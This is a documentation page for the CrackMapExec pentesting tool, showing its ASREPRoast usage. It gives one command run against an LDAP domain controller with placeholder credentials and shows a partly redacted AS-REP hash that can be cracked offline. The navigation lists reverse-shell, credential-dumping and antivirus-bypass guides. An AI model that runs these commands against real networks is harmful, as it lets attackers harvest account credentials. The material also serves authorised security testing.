CrackMapExec 5.4.0
Home
Discord
Author
Search
⌃
K
Links
💞
A swiss army knife for Pentesting networks
Author
1⃣
Tool
🟢
Linux
Docker
🟢
Parameters
Scan Optimization
🟢
Target Definition - CME
Protocols
1⃣
SMB CrackMapExec
2⃣
LDAP CrackMapExec
🟠
LDAP Modules List
🟠
Extract LDAP users descriptions
🟢
Extract Network Information
🟢
Trust for Delegation
🟢
Admin Count
🟠
Kerberoasting
🟠
ASREPRoast
🟢
LAPS
3⃣
MsSQL CrackMapExec
FTP CrackMapExec
SSH CrackMapExec
RDP CrackMapExec
WinRM CrackMapExec
🥷
Integrations
🔴
BloodHound and CrackMapExec
🔴
DeathStar and CrackMapExec
🥷
Get Reverse Shell
🟢
CME Reverse Shell with Metasploit
🟢
CME Reverse Shell with Empire
🔴
CME Reverse Shell with Covenant
Use Cases
🔥
Scan for SMB Vulnerabilities using CrackMapExec
🔥
Dump Credentials with CrackMapExec
🔥
Anti Virus Bypass with CrackMapExec
🥷
Dump Credentials
Windows Machine
Linux Machine
🥷
Databases
Workspaces
Credentials
Powered By
GitBook
🟠
ASREPRoast
crackmapexec ldap 10.100.2.110 -u rfs -p <passd> --kdcHost <Host> --asreproast output.txt
LDAP 10.100.2.110 389 dc01
[email protected]
:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5
Previous
Kerberoasting
Next
LAPS
Last modified
8mo ago